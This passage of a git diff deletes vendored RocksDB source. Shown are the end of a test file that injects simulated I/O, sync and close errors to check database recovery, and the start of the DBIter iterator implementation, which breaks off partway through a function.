-TEST_F(DBIOFailureTest, NoSpaceCompactRange) {
-  do {
-    Options options = CurrentOptions();
-    options.env = env_;
-    options.disable_auto_compactions = true;
-    Reopen(options);
-
-    // generate 5 tables
-    for (int i = 0; i < 5; ++i) {
-      ASSERT_OK(Put(Key(i), Key(i) + "v"));
-      ASSERT_OK(Flush());
-    }
-
-    // Force out-of-space errors
-    env_->no_space_.store(true, std::memory_order_release);
-
-    Status s = dbfull()->TEST_CompactRange(0, nullptr, nullptr, nullptr,
-                                           true /* disallow trivial move */);
-    ASSERT_TRUE(s.IsIOError());
-    ASSERT_TRUE(s.IsNoSpace());
-
-    env_->no_space_.store(false, std::memory_order_release);
-  } while (ChangeCompactOptions());
-}
-
-TEST_F(DBIOFailureTest, NonWritableFileSystem) {
-  do {
-    Options options = CurrentOptions();
-    options.write_buffer_size = 4096;
-    options.arena_block_size = 4096;
-    options.env = env_;
-    Reopen(options);
-    ASSERT_OK(Put("foo", "v1"));
-    env_->non_writeable_rate_.store(100);
-    std::string big(100000, 'x');
-    int errors = 0;
-    for (int i = 0; i < 20; i++) {
-      if (!Put("foo", big).ok()) {
-        errors++;
-        env_->SleepForMicroseconds(100000);
-      }
-    }
-    ASSERT_GT(errors, 0);
-    env_->non_writeable_rate_.store(0);
-  } while (ChangeCompactOptions());
-}
-
-#ifndef ROCKSDB_LITE
-TEST_F(DBIOFailureTest, ManifestWriteError) {
-  // Test for the following problem:
-  // (a) Compaction produces file F
-  // (b) Log record containing F is written to MANIFEST file, but Sync() fails
-  // (c) GC deletes F
-  // (d) After reopening DB, reads fail since deleted F is named in log record
-
-  // We iterate twice.  In the second iteration, everything is the
-  // same except the log record never makes it to the MANIFEST file.
-  for (int iter = 0; iter < 2; iter++) {
-    std::atomic<bool>* error_type = (iter == 0) ? &env_->manifest_sync_error_
-                                                : &env_->manifest_write_error_;
-
-    // Insert foo=>bar mapping
-    Options options = CurrentOptions();
-    options.env = env_;
-    options.create_if_missing = true;
-    options.error_if_exists = false;
-    options.paranoid_checks = true;
-    DestroyAndReopen(options);
-    ASSERT_OK(Put("foo", "bar"));
-    ASSERT_EQ("bar", Get("foo"));
-
-    // Memtable compaction (will succeed)
-    Flush();
-    ASSERT_EQ("bar", Get("foo"));
-    const int last = 2;
-    MoveFilesToLevel(2);
-    ASSERT_EQ(NumTableFilesAtLevel(last), 1);  // foo=>bar is now in last level
-
-    // Merging compaction (will fail)
-    error_type->store(true, std::memory_order_release);
-    dbfull()->TEST_CompactRange(last, nullptr, nullptr);  // Should fail
-    ASSERT_EQ("bar", Get("foo"));
-
-    error_type->store(false, std::memory_order_release);
-
-    // Since paranoid_checks=true, writes should fail
-    ASSERT_NOK(Put("foo2", "bar2"));
-
-    // Recovery: should not lose data
-    ASSERT_EQ("bar", Get("foo"));
-
-    // Try again with paranoid_checks=false
-    Close();
-    options.paranoid_checks = false;
-    Reopen(options);
-
-    // Merging compaction (will fail)
-    error_type->store(true, std::memory_order_release);
-    dbfull()->TEST_CompactRange(last, nullptr, nullptr);  // Should fail
-    ASSERT_EQ("bar", Get("foo"));
-
-    // Recovery: should not lose data
-    error_type->store(false, std::memory_order_release);
-    Reopen(options);
-    ASSERT_EQ("bar", Get("foo"));
-
-    // Since paranoid_checks=false, writes should succeed
-    ASSERT_OK(Put("foo2", "bar2"));
-    ASSERT_EQ("bar", Get("foo"));
-    ASSERT_EQ("bar2", Get("foo2"));
-  }
-}
-
-TEST_F(DBIOFailureTest, PutFailsParanoid) {
-  // Test the following:
-  // (a) A random put fails in paranoid mode (simulate by sync fail)
-  // (b) All other puts have to fail, even if writes would succeed
-  // (c) All of that should happen ONLY if paranoid_checks = true
-
-  Options options = CurrentOptions();
-  options.env = env_;
-  options.create_if_missing = true;
-  options.error_if_exists = false;
-  options.paranoid_checks = true;
-  DestroyAndReopen(options);
-  CreateAndReopenWithCF({"pikachu"}, options);
-  Status s;
-
-  ASSERT_OK(Put(1, "foo", "bar"));
-  ASSERT_OK(Put(1, "foo1", "bar1"));
-  // simulate error
-  env_->log_write_error_.store(true, std::memory_order_release);
-  s = Put(1, "foo2", "bar2");
-  ASSERT_TRUE(!s.ok());
-  env_->log_write_error_.store(false, std::memory_order_release);
-  s = Put(1, "foo3", "bar3");
-  // the next put should fail, too
-  ASSERT_TRUE(!s.ok());
-  // but we're still able to read
-  ASSERT_EQ("bar", Get(1, "foo"));
-
-  // do the same thing with paranoid checks off
-  options.paranoid_checks = false;
-  DestroyAndReopen(options);
-  CreateAndReopenWithCF({"pikachu"}, options);
-
-  ASSERT_OK(Put(1, "foo", "bar"));
-  ASSERT_OK(Put(1, "foo1", "bar1"));
-  // simulate error
-  env_->log_write_error_.store(true, std::memory_order_release);
-  s = Put(1, "foo2", "bar2");
-  ASSERT_TRUE(!s.ok());
-  env_->log_write_error_.store(false, std::memory_order_release);
-  s = Put(1, "foo3", "bar3");
-  // the next put should NOT fail
-  ASSERT_TRUE(s.ok());
-}
-#if !(defined NDEBUG) || !defined(OS_WIN)
-TEST_F(DBIOFailureTest, FlushSstRangeSyncError) {
-  Options options = CurrentOptions();
-  options.env = env_;
-  options.create_if_missing = true;
-  options.error_if_exists = false;
-  options.paranoid_checks = true;
-  options.write_buffer_size = 256 * 1024 * 1024;
-  options.writable_file_max_buffer_size = 128 * 1024;
-  options.bytes_per_sync = 128 * 1024;
-  options.level0_file_num_compaction_trigger = 4;
-  options.memtable_factory.reset(new SpecialSkipListFactory(10));
-  BlockBasedTableOptions table_options;
-  table_options.filter_policy.reset(NewBloomFilterPolicy(10));
-  options.table_factory.reset(NewBlockBasedTableFactory(table_options));
-
-  DestroyAndReopen(options);
-  CreateAndReopenWithCF({"pikachu"}, options);
-  Status s;
-
-  std::atomic<int> range_sync_called(0);
-  rocksdb::SyncPoint::GetInstance()->SetCallBack(
-      "SpecialEnv::SStableFile::RangeSync", [&](void* arg) {
-        if (range_sync_called.fetch_add(1) == 0) {
-          Status* st = static_cast<Status*>(arg);
-          *st = Status::IOError("range sync dummy error");
-        }
-      });
-  rocksdb::SyncPoint::GetInstance()->EnableProcessing();
-
-  Random rnd(301);
-  std::string rnd_str =
-      RandomString(&rnd, static_cast<int>(options.bytes_per_sync / 2));
-  std::string rnd_str_512kb = RandomString(&rnd, 512 * 1024);
-
-  ASSERT_OK(Put(1, "foo", "bar"));
-  // First 1MB doesn't get range synced
-  ASSERT_OK(Put(1, "foo0_0", rnd_str_512kb));
-  ASSERT_OK(Put(1, "foo0_1", rnd_str_512kb));
-  ASSERT_OK(Put(1, "foo1_1", rnd_str));
-  ASSERT_OK(Put(1, "foo1_2", rnd_str));
-  ASSERT_OK(Put(1, "foo1_3", rnd_str));
-  ASSERT_OK(Put(1, "foo2", "bar"));
-  ASSERT_OK(Put(1, "foo3_1", rnd_str));
-  ASSERT_OK(Put(1, "foo3_2", rnd_str));
-  ASSERT_OK(Put(1, "foo3_3", rnd_str));
-  ASSERT_OK(Put(1, "foo4", "bar"));
-  dbfull()->TEST_WaitForFlushMemTable(handles_[1]);
-
-  // Following writes should fail as flush failed.
-  ASSERT_NOK(Put(1, "foo2", "bar3"));
-  ASSERT_EQ("bar", Get(1, "foo"));
-
-  rocksdb::SyncPoint::GetInstance()->DisableProcessing();
-  ASSERT_GE(1, range_sync_called.load());
-
-  ReopenWithColumnFamilies({"default", "pikachu"}, options);
-  ASSERT_EQ("bar", Get(1, "foo"));
-}
-
-TEST_F(DBIOFailureTest, CompactSstRangeSyncError) {
-  Options options = CurrentOptions();
-  options.env = env_;
-  options.create_if_missing = true;
-  options.error_if_exists = false;
-  options.paranoid_checks = true;
-  options.write_buffer_size = 256 * 1024 * 1024;
-  options.writable_file_max_buffer_size = 128 * 1024;
-  options.bytes_per_sync = 128 * 1024;
-  options.level0_file_num_compaction_trigger = 2;
-  options.target_file_size_base = 256 * 1024 * 1024;
-  options.disable_auto_compactions = true;
-  BlockBasedTableOptions table_options;
-  table_options.filter_policy.reset(NewBloomFilterPolicy(10));
-  options.table_factory.reset(NewBlockBasedTableFactory(table_options));
-  DestroyAndReopen(options);
-  CreateAndReopenWithCF({"pikachu"}, options);
-  Status s;
-
-  Random rnd(301);
-  std::string rnd_str =
-      RandomString(&rnd, static_cast<int>(options.bytes_per_sync / 2));
-  std::string rnd_str_512kb = RandomString(&rnd, 512 * 1024);
-
-  ASSERT_OK(Put(1, "foo", "bar"));
-  // First 1MB doesn't get range synced
-  ASSERT_OK(Put(1, "foo0_0", rnd_str_512kb));
-  ASSERT_OK(Put(1, "foo0_1", rnd_str_512kb));
-  ASSERT_OK(Put(1, "foo1_1", rnd_str));
-  ASSERT_OK(Put(1, "foo1_2", rnd_str));
-  ASSERT_OK(Put(1, "foo1_3", rnd_str));
-  Flush(1);
-  ASSERT_OK(Put(1, "foo", "bar"));
-  ASSERT_OK(Put(1, "foo3_1", rnd_str));
-  ASSERT_OK(Put(1, "foo3_2", rnd_str));
-  ASSERT_OK(Put(1, "foo3_3", rnd_str));
-  ASSERT_OK(Put(1, "foo4", "bar"));
-  Flush(1);
-  dbfull()->TEST_WaitForFlushMemTable(handles_[1]);
-
-  std::atomic<int> range_sync_called(0);
-  rocksdb::SyncPoint::GetInstance()->SetCallBack(
-      "SpecialEnv::SStableFile::RangeSync", [&](void* arg) {
-        if (range_sync_called.fetch_add(1) == 0) {
-          Status* st = static_cast<Status*>(arg);
-          *st = Status::IOError("range sync dummy error");
-        }
-      });
-  rocksdb::SyncPoint::GetInstance()->EnableProcessing();
-
-  ASSERT_OK(dbfull()->SetOptions(handles_[1],
-                                 {
-                                     {"disable_auto_compactions", "false"},
-                                 }));
-  dbfull()->TEST_WaitForCompact();
-
-  // Following writes should fail as flush failed.
-  ASSERT_NOK(Put(1, "foo2", "bar3"));
-  ASSERT_EQ("bar", Get(1, "foo"));
-
-  rocksdb::SyncPoint::GetInstance()->DisableProcessing();
-  ASSERT_GE(1, range_sync_called.load());
-
-  ReopenWithColumnFamilies({"default", "pikachu"}, options);
-  ASSERT_EQ("bar", Get(1, "foo"));
-}
-
-TEST_F(DBIOFailureTest, FlushSstCloseError) {
-  Options options = CurrentOptions();
-  options.env = env_;
-  options.create_if_missing = true;
-  options.error_if_exists = false;
-  options.paranoid_checks = true;
-  options.level0_file_num_compaction_trigger = 4;
-  options.memtable_factory.reset(new SpecialSkipListFactory(2));
-
-  DestroyAndReopen(options);
-  CreateAndReopenWithCF({"pikachu"}, options);
-  Status s;
-  std::atomic<int> close_called(0);
-  rocksdb::SyncPoint::GetInstance()->SetCallBack(
-      "SpecialEnv::SStableFile::Close", [&](void* arg) {
-        if (close_called.fetch_add(1) == 0) {
-          Status* st = static_cast<Status*>(arg);
-          *st = Status::IOError("close dummy error");
-        }
-      });
-
-  rocksdb::SyncPoint::GetInstance()->EnableProcessing();
-
-  ASSERT_OK(Put(1, "foo", "bar"));
-  ASSERT_OK(Put(1, "foo1", "bar1"));
-  ASSERT_OK(Put(1, "foo", "bar2"));
-  dbfull()->TEST_WaitForFlushMemTable(handles_[1]);
-
-  // Following writes should fail as flush failed.
-  ASSERT_NOK(Put(1, "foo2", "bar3"));
-  ASSERT_EQ("bar2", Get(1, "foo"));
-  ASSERT_EQ("bar1", Get(1, "foo1"));
-
-  rocksdb::SyncPoint::GetInstance()->DisableProcessing();
-
-  ReopenWithColumnFamilies({"default", "pikachu"}, options);
-  ASSERT_EQ("bar2", Get(1, "foo"));
-  ASSERT_EQ("bar1", Get(1, "foo1"));
-}
-
-TEST_F(DBIOFailureTest, CompactionSstCloseError) {
-  Options options = CurrentOptions();
-  options.env = env_;
-  options.create_if_missing = true;
-  options.error_if_exists = false;
-  options.paranoid_checks = true;
-  options.level0_file_num_compaction_trigger = 2;
-  options.disable_auto_compactions = true;
-
-  DestroyAndReopen(options);
-  CreateAndReopenWithCF({"pikachu"}, options);
-  Status s;
-
-  ASSERT_OK(Put(1, "foo", "bar"));
-  ASSERT_OK(Put(1, "foo2", "bar"));
-  Flush(1);
-  ASSERT_OK(Put(1, "foo", "bar2"));
-  ASSERT_OK(Put(1, "foo2", "bar"));
-  Flush(1);
-  ASSERT_OK(Put(1, "foo", "bar3"));
-  ASSERT_OK(Put(1, "foo2", "bar"));
-  Flush(1);
-  dbfull()->TEST_WaitForCompact();
-
-  std::atomic<int> close_called(0);
-  rocksdb::SyncPoint::GetInstance()->SetCallBack(
-      "SpecialEnv::SStableFile::Close", [&](void* arg) {
-        if (close_called.fetch_add(1) == 0) {
-          Status* st = static_cast<Status*>(arg);
-          *st = Status::IOError("close dummy error");
-        }
-      });
-
-  rocksdb::SyncPoint::GetInstance()->EnableProcessing();
-  ASSERT_OK(dbfull()->SetOptions(handles_[1],
-                                 {
-                                     {"disable_auto_compactions", "false"},
-                                 }));
-  dbfull()->TEST_WaitForCompact();
-
-  // Following writes should fail as compaction failed.
-  ASSERT_NOK(Put(1, "foo2", "bar3"));
-  ASSERT_EQ("bar3", Get(1, "foo"));
-
-  rocksdb::SyncPoint::GetInstance()->DisableProcessing();
-
-  ReopenWithColumnFamilies({"default", "pikachu"}, options);
-  ASSERT_EQ("bar3", Get(1, "foo"));
-}
-
-TEST_F(DBIOFailureTest, FlushSstSyncError) {
-  Options options = CurrentOptions();
-  options.env = env_;
-  options.create_if_missing = true;
-  options.error_if_exists = false;
-  options.paranoid_checks = true;
-  options.use_fsync = false;
-  options.level0_file_num_compaction_trigger = 4;
-  options.memtable_factory.reset(new SpecialSkipListFactory(2));
-
-  DestroyAndReopen(options);
-  CreateAndReopenWithCF({"pikachu"}, options);
-  Status s;
-  std::atomic<int> sync_called(0);
-  rocksdb::SyncPoint::GetInstance()->SetCallBack(
-      "SpecialEnv::SStableFile::Sync", [&](void* arg) {
-        if (sync_called.fetch_add(1) == 0) {
-          Status* st = static_cast<Status*>(arg);
-          *st = Status::IOError("sync dummy error");
-        }
-      });
-
-  rocksdb::SyncPoint::GetInstance()->EnableProcessing();
-
-  ASSERT_OK(Put(1, "foo", "bar"));
-  ASSERT_OK(Put(1, "foo1", "bar1"));
-  ASSERT_OK(Put(1, "foo", "bar2"));
-  dbfull()->TEST_WaitForFlushMemTable(handles_[1]);
-
-  // Following writes should fail as flush failed.
-  ASSERT_NOK(Put(1, "foo2", "bar3"));
-  ASSERT_EQ("bar2", Get(1, "foo"));
-  ASSERT_EQ("bar1", Get(1, "foo1"));
-
-  rocksdb::SyncPoint::GetInstance()->DisableProcessing();
-
-  ReopenWithColumnFamilies({"default", "pikachu"}, options);
-  ASSERT_EQ("bar2", Get(1, "foo"));
-  ASSERT_EQ("bar1", Get(1, "foo1"));
-}
-
-TEST_F(DBIOFailureTest, CompactionSstSyncError) {
-  Options options = CurrentOptions();
-  options.env = env_;
-  options.create_if_missing = true;
-  options.error_if_exists = false;
-  options.paranoid_checks = true;
-  options.level0_file_num_compaction_trigger = 2;
-  options.disable_auto_compactions = true;
-  options.use_fsync = false;
-
-  DestroyAndReopen(options);
-  CreateAndReopenWithCF({"pikachu"}, options);
-  Status s;
-
-  ASSERT_OK(Put(1, "foo", "bar"));
-  ASSERT_OK(Put(1, "foo2", "bar"));
-  Flush(1);
-  ASSERT_OK(Put(1, "foo", "bar2"));
-  ASSERT_OK(Put(1, "foo2", "bar"));
-  Flush(1);
-  ASSERT_OK(Put(1, "foo", "bar3"));
-  ASSERT_OK(Put(1, "foo2", "bar"));
-  Flush(1);
-  dbfull()->TEST_WaitForCompact();
-
-  std::atomic<int> sync_called(0);
-  rocksdb::SyncPoint::GetInstance()->SetCallBack(
-      "SpecialEnv::SStableFile::Sync", [&](void* arg) {
-        if (sync_called.fetch_add(1) == 0) {
-          Status* st = static_cast<Status*>(arg);
-          *st = Status::IOError("close dummy error");
-        }
-      });
-
-  rocksdb::SyncPoint::GetInstance()->EnableProcessing();
-  ASSERT_OK(dbfull()->SetOptions(handles_[1],
-                                 {
-                                     {"disable_auto_compactions", "false"},
-                                 }));
-  dbfull()->TEST_WaitForCompact();
-
-  // Following writes should fail as compaction failed.
-  ASSERT_NOK(Put(1, "foo2", "bar3"));
-  ASSERT_EQ("bar3", Get(1, "foo"));
-
-  rocksdb::SyncPoint::GetInstance()->DisableProcessing();
-
-  ReopenWithColumnFamilies({"default", "pikachu"}, options);
-  ASSERT_EQ("bar3", Get(1, "foo"));
-}
-#endif  // !(defined NDEBUG) || !defined(OS_WIN)
-#endif  // ROCKSDB_LITE
-}  // namespace rocksdb
-
-int main(int argc, char** argv) {
-  rocksdb::port::InstallStackTraceHandler();
-  ::testing::InitGoogleTest(&argc, argv);
-  return RUN_ALL_TESTS();
-}
diff --git a/thirdparty/rocksdb/db/db_iter.cc b/thirdparty/rocksdb/db/db_iter.cc
deleted file mode 100644
index e4a6c92..0000000
--- a/thirdparty/rocksdb/db/db_iter.cc
+++ /dev/null
@@ -1,1326 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-// Copyright (c) 2011 The LevelDB Authors. All rights reserved.
-// Use of this source code is governed by a BSD-style license that can be
-// found in the LICENSE file. See the AUTHORS file for names of contributors.
-
-#include "db/db_iter.h"
-#include <string>
-#include <limits>
-
-#include "db/dbformat.h"
-#include "db/merge_context.h"
-#include "db/merge_helper.h"
-#include "db/pinned_iterators_manager.h"
-#include "monitoring/perf_context_imp.h"
-#include "rocksdb/env.h"
-#include "rocksdb/iterator.h"
-#include "rocksdb/merge_operator.h"
-#include "rocksdb/options.h"
-#include "table/internal_iterator.h"
-#include "util/arena.h"
-#include "util/filename.h"
-#include "util/logging.h"
-#include "util/mutexlock.h"
-#include "util/string_util.h"
-
-namespace rocksdb {
-
-#if 0
-static void DumpInternalIter(Iterator* iter) {
-  for (iter->SeekToFirst(); iter->Valid(); iter->Next()) {
-    ParsedInternalKey k;
-    if (!ParseInternalKey(iter->key(), &k)) {
-      fprintf(stderr, "Corrupt '%s'\n", EscapeString(iter->key()).c_str());
-    } else {
-      fprintf(stderr, "@ '%s'\n", k.DebugString().c_str());
-    }
-  }
-}
-#endif
-
-// Memtables and sstables that make the DB representation contain
-// (userkey,seq,type) => uservalue entries.  DBIter
-// combines multiple entries for the same userkey found in the DB
-// representation into a single entry while accounting for sequence
-// numbers, deletion markers, overwrites, etc.
-class DBIter: public Iterator {
- public:
-  // The following is grossly complicated. TODO: clean it up
-  // Which direction is the iterator currently moving?
-  // (1) When moving forward, the internal iterator is positioned at
-  //     the exact entry that yields this->key(), this->value()
-  // (2) When moving backwards, the internal iterator is positioned
-  //     just before all entries whose user key == this->key().
-  enum Direction {
-    kForward,
-    kReverse
-  };
-
-  // LocalStatistics contain Statistics counters that will be aggregated per
-  // each iterator instance and then will be sent to the global statistics when
-  // the iterator is destroyed.
-  //
-  // The purpose of this approach is to avoid perf regression happening
-  // when multiple threads bump the atomic counters from a DBIter::Next().
-  struct LocalStatistics {
-    explicit LocalStatistics() { ResetCounters(); }
-
-    void ResetCounters() {
-      next_count_ = 0;
-      next_found_count_ = 0;
-      prev_count_ = 0;
-      prev_found_count_ = 0;
-      bytes_read_ = 0;
-    }
-
-    void BumpGlobalStatistics(Statistics* global_statistics) {
-      RecordTick(global_statistics, NUMBER_DB_NEXT, next_count_);
-      RecordTick(global_statistics, NUMBER_DB_NEXT_FOUND, next_found_count_);
-      RecordTick(global_statistics, NUMBER_DB_PREV, prev_count_);
-      RecordTick(global_statistics, NUMBER_DB_PREV_FOUND, prev_found_count_);
-      RecordTick(global_statistics, ITER_BYTES_READ, bytes_read_);
-      PERF_COUNTER_ADD(iter_read_bytes, bytes_read_);
-      ResetCounters();
-    }
-
-    // Map to Tickers::NUMBER_DB_NEXT
-    uint64_t next_count_;
-    // Map to Tickers::NUMBER_DB_NEXT_FOUND
-    uint64_t next_found_count_;
-    // Map to Tickers::NUMBER_DB_PREV
-    uint64_t prev_count_;
-    // Map to Tickers::NUMBER_DB_PREV_FOUND
-    uint64_t prev_found_count_;
-    // Map to Tickers::ITER_BYTES_READ
-    uint64_t bytes_read_;
-  };
-
-  DBIter(Env* _env, const ReadOptions& read_options,
-         const ImmutableCFOptions& cf_options, const Comparator* cmp,
-         InternalIterator* iter, SequenceNumber s, bool arena_mode,
-         uint64_t max_sequential_skip_in_iterations, bool allow_blob)
-      : arena_mode_(arena_mode),
-        env_(_env),
-        logger_(cf_options.info_log),
-        user_comparator_(cmp),
-        merge_operator_(cf_options.merge_operator),
-        iter_(iter),
-        sequence_(s),
-        direction_(kForward),
-        valid_(false),
-        current_entry_is_merged_(false),
-        statistics_(cf_options.statistics),
-        iterate_upper_bound_(read_options.iterate_upper_bound),
-        prefix_same_as_start_(read_options.prefix_same_as_start),
-        pin_thru_lifetime_(read_options.pin_data),
-        total_order_seek_(read_options.total_order_seek),
-        range_del_agg_(cf_options.internal_comparator, s,
-                       true /* collapse_deletions */),
-        allow_blob_(allow_blob) {
-    RecordTick(statistics_, NO_ITERATORS);
-    prefix_extractor_ = cf_options.prefix_extractor;
-    max_skip_ = max_sequential_skip_in_iterations;
-    max_skippable_internal_keys_ = read_options.max_skippable_internal_keys;
-    if (pin_thru_lifetime_) {
-      pinned_iters_mgr_.StartPinning();
-    }
-    if (iter_) {
-      iter_->SetPinnedItersMgr(&pinned_iters_mgr_);
-    }
-  }
-  virtual ~DBIter() {
-    // Release pinned data if any
-    if (pinned_iters_mgr_.PinningEnabled()) {
-      pinned_iters_mgr_.ReleasePinnedData();
-    }
-    RecordTick(statistics_, NO_ITERATORS, -1);
-    local_stats_.BumpGlobalStatistics(statistics_);
-    if (!arena_mode_) {
-      delete iter_;
-    } else {
-      iter_->~InternalIterator();
-    }
-  }
-  virtual void SetIter(InternalIterator* iter) {
-    assert(iter_ == nullptr);
-    iter_ = iter;
-    iter_->SetPinnedItersMgr(&pinned_iters_mgr_);
-  }
-  virtual RangeDelAggregator* GetRangeDelAggregator() {
-    return &range_del_agg_;
-  }
-
-  virtual bool Valid() const override { return valid_; }
-  virtual Slice key() const override {
-    assert(valid_);
-    return saved_key_.GetUserKey();
-  }
-  virtual Slice value() const override {
-    assert(valid_);
-    if (current_entry_is_merged_) {
-      // If pinned_value_ is set then the result of merge operator is one of
-      // the merge operands and we should return it.
-      return pinned_value_.data() ? pinned_value_ : saved_value_;
-    } else if (direction_ == kReverse) {
-      return pinned_value_;
-    } else {
-      return iter_->value();
-    }
-  }
-  virtual Status status() const override {
-    if (status_.ok()) {
-      return iter_->status();
-    } else {
-      return status_;
-    }
-  }
-  bool IsBlob() const {
-    assert(valid_ && (allow_blob_ || !is_blob_));
-    return is_blob_;
-  }
-
-  virtual Status GetProperty(std::string prop_name,
-                             std::string* prop) override {
-    if (prop == nullptr) {
-      return Status::InvalidArgument("prop is nullptr");
-    }
-    if (prop_name == "rocksdb.iterator.super-version-number") {
-      // First try to pass the value returned from inner iterator.
-      return iter_->GetProperty(prop_name, prop);
-    } else if (prop_name == "rocksdb.iterator.is-key-pinned") {
-      if (valid_) {
-        *prop = (pin_thru_lifetime_ && saved_key_.IsKeyPinned()) ? "1" : "0";
-      } else {
-        *prop = "Iterator is not valid.";
-      }
-      return Status::OK();
-    }
-    return Status::InvalidArgument("Undentified property.");
-  }
-
-  virtual void Next() override;
-  virtual void Prev() override;
-  virtual void Seek(const Slice& target) override;
-  virtual void SeekForPrev(const Slice& target) override;
-  virtual void SeekToFirst() override;
-  virtual void SeekToLast() override;
-  Env* env() { return env_; }
-  void set_sequence(uint64_t s) { sequence_ = s; }
-  void set_valid(bool v) { valid_ = v; }
-
- private:
-  void ReverseToForward();
-  void ReverseToBackward();
-  void PrevInternal();
-  void FindParseableKey(ParsedInternalKey* ikey, Direction direction);
-  bool FindValueForCurrentKey();
-  bool FindValueForCurrentKeyUsingSeek();
-  void FindPrevUserKey();
-  void FindNextUserKey();
-  inline void FindNextUserEntry(bool skipping, bool prefix_check);
-  void FindNextUserEntryInternal(bool skipping, bool prefix_check);
-  bool ParseKey(ParsedInternalKey* key);
-  void MergeValuesNewToOld();
-  bool TooManyInternalKeysSkipped(bool increment = true);
-
-  // Temporarily pin the blocks that we encounter until ReleaseTempPinnedData()
-  // is called
-  void TempPinData() {
-    if (!pin_thru_lifetime_) {
-      pinned_iters_mgr_.StartPinning();
-    }
-  }
-
-  // Release blocks pinned by TempPinData()
-  void ReleaseTempPinnedData() {
-    if (!pin_thru_lifetime_ && pinned_iters_mgr_.PinningEnabled()) {
-      pinned_iters_mgr_.ReleasePinnedData();
-    }
-  }
-
-  inline void ClearSavedValue() {
-    if (saved_value_.capacity() > 1048576) {
-      std::string empty;
-      swap(empty, saved_value_);
-    } else {
-      saved_value_.clear();
-    }
-  }
-
-  inline void ResetInternalKeysSkippedCounter() {
-    num_internal_keys_skipped_ = 0;
-  }
-
-  const SliceTransform* prefix_extractor_;
-  bool arena_mode_;
-  Env* const env_;
-  Logger* logger_;
-  const Comparator* const user_comparator_;
-  const MergeOperator* const merge_operator_;
-  InternalIterator* iter_;
-  SequenceNumber sequence_;
-
-  Status status_;
-  IterKey saved_key_;
-  std::string saved_value_;
-  Slice pinned_value_;
-  Direction direction_;
-  bool valid_;
-  bool current_entry_is_merged_;
-  // for prefix seek mode to support prev()
-  Statistics* statistics_;
-  uint64_t max_skip_;
-  uint64_t max_skippable_internal_keys_;
-  uint64_t num_internal_keys_skipped_;
-  const Slice* iterate_upper_bound_;
-  IterKey prefix_start_buf_;
-  Slice prefix_start_key_;
-  const bool prefix_same_as_start_;
-  // Means that we will pin all data blocks we read as long the Iterator
-  // is not deleted, will be true if ReadOptions::pin_data is true
-  const bool pin_thru_lifetime_;
-  const bool total_order_seek_;
-  // List of operands for merge operator.
-  MergeContext merge_context_;
-  RangeDelAggregator range_del_agg_;
-  LocalStatistics local_stats_;
-  PinnedIteratorsManager pinned_iters_mgr_;
-  bool allow_blob_;
-  bool is_blob_;
-
-  // No copying allowed
-  DBIter(const DBIter&);
-  void operator=(const DBIter&);
-};
-
-inline bool DBIter::ParseKey(ParsedInternalKey* ikey) {
-  if (!ParseInternalKey(iter_->key(), ikey)) {
-    status_ = Status::Corruption("corrupted internal key in DBIter");
-    ROCKS_LOG_ERROR(logger_, "corrupted internal key in DBIter: %s",
-                    iter_->key().ToString(true).c_str());
-    return false;
-  } else {
-    return true;
-  }
-}
-
-void DBIter::Next() {
-  assert(valid_);
-
-  // Release temporarily pinned blocks from last operation
-  ReleaseTempPinnedData();
-  ResetInternalKeysSkippedCounter();
-  if (direction_ == kReverse) {
-    ReverseToForward();
-  } else if (iter_->Valid() && !current_entry_is_merged_) {
-    // If the current value is not a merge, the iter position is the
-    // current key, which is already returned. We can safely issue a
-    // Next() without checking the current key.
-    // If the current key is a merge, very likely iter already points
-    // to the next internal position.
-    iter_->Next();
-    PERF_COUNTER_ADD(internal_key_skipped_count, 1);
-  }
-
-  if (statistics_ != nullptr) {
-    local_stats_.next_count_++;
-  }
-  // Now we point to the next internal position, for both of merge and
-  // not merge cases.
-  if (!iter_->Valid()) {
-    valid_ = false;
-    return;
-  }
-  FindNextUserEntry(true /* skipping the current user key */, prefix_same_as_start_);
-  if (statistics_ != nullptr && valid_) {
-    local_stats_.next_found_count_++;
-    local_stats_.bytes_read_ += (key().size() + value().size());
-  }
-}
-
-// PRE: saved_key_ has the current user key if skipping
-// POST: saved_key_ should have the next user key if valid_,
-//       if the current entry is a result of merge
-//           current_entry_is_merged_ => true
-//           saved_value_             => the merged value
-//
-// NOTE: In between, saved_key_ can point to a user key that has
-//       a delete marker or a sequence number higher than sequence_
-//       saved_key_ MUST have a proper user_key before calling this function
-//
-// The prefix_check parameter controls whether we check the iterated
-// keys against the prefix of the seeked key. Set to false when
-// performing a seek without a key (e.g. SeekToFirst). Set to
-// prefix_same_as_start_ for other iterations.
-inline void DBIter::FindNextUserEntry(bool skipping, bool prefix_check) {
-  PERF_TIMER_GUARD(find_next_user_entry_time);
-  FindNextUserEntryInternal(skipping, prefix_check);
-}
-
-// Actual implementation of DBIter::FindNextUserEntry()
-void DBIter::FindNextUserEntryInternal(bool skipping, bool prefix_check) {
-  // Loop until we hit an acceptable entry to yield
-  assert(iter_->Valid());
-  assert(direction_ == kForward);
-  current_entry_is_merged_ = false;
-
-  // How many times in a row we have skipped an entry with user key less than
-  // or equal to saved_key_. We could skip these entries either because
-  // sequence numbers were too high or because skipping = true.
-  // What saved_key_ contains throughout this method:
-  //  - if skipping        : saved_key_ contains the key that we need to skip,
-  //                         and we haven't seen any keys greater than that,
-  //  - if num_skipped > 0 : saved_key_ contains the key that we have skipped
-  //                         num_skipped times, and we haven't seen any keys
-  //                         greater than that,
-  //  - none of the above  : saved_key_ can contain anything, it doesn't matter.
-  uint64_t num_skipped = 0;
-
-  is_blob_ = false;
-
-  do {
-    ParsedInternalKey ikey;
-
-    if (!ParseKey(&ikey)) {
-      // Skip corrupted keys.
-      iter_->Next();
-      continue;
-    }
-
-    if (iterate_upper_bound_ != nullptr &&
-        user_comparator_->Compare(ikey.user_key, *iterate_upper_bound_) >= 0) {
-      break;
-    }
-
-    if (prefix_extractor_ && prefix_check &&
-        prefix_extractor_->Transform(ikey.user_key)
-          .compare(prefix_start_key_) != 0) {
-      break;
-    }
-
-    if (TooManyInternalKeysSkipped()) {
-      return;
-    }
-
-    if (ikey.sequence <= sequence_) {
-      if (skipping &&
-          user_comparator_->Compare(ikey.user_key, saved_key_.GetUserKey()) <=
-              0) {
-        num_skipped++;  // skip this entry
-        PERF_COUNTER_ADD(internal_key_skipped_count, 1);
-      } else {
-        num_skipped = 0;
-        switch (ikey.type) {
-          case kTypeDeletion:
